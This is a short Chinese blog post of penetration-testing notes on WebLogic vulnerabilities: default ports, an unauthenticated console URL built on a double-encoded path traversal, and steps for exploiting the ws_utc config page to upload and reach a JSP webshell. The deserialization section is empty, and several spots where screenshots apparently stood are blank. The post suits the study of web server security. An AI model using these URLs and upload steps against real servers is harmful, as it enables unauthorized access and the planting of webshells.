weblogic常见漏洞

前言

weblogic的管理端口是:7001

tomcat端口:8080

jboss端口:8080

端口可以改

一、未授权登录

进入登录界面:http://192.168.18.45:7001/console/login/LoginForm.jsp

 

 

未授权访问漏洞:http://192.168.18.45:7001/console/css/%252e%252e%252fconsole.portal,通过这段代码不用登录就可以直接访问,

 

 

 

二、任意文件上传漏洞操作

文字叙述步骤:

未授权访问路径:http://192.168.18.45:7001/ws_utc/config.do
Weblogic默认路径:
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\tmp\WSTestPageWorkDir
我们改成以下路径
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\wstestclient\i7n5e1\war\css
木马上传上去之后,访问方式如下:
http://192.168.0.127:7001/ws_utc/css/config/keystore/1604376329959_whoami.jsp
1604376329959_whoami.jsp

具体操作

 

 

 

 

 

 

 

 

 

 

三、反序列化

 

 

 

posted @ 2021-01-12 16:10  兰博~~  阅读(5182)  评论(1编辑  收藏  举报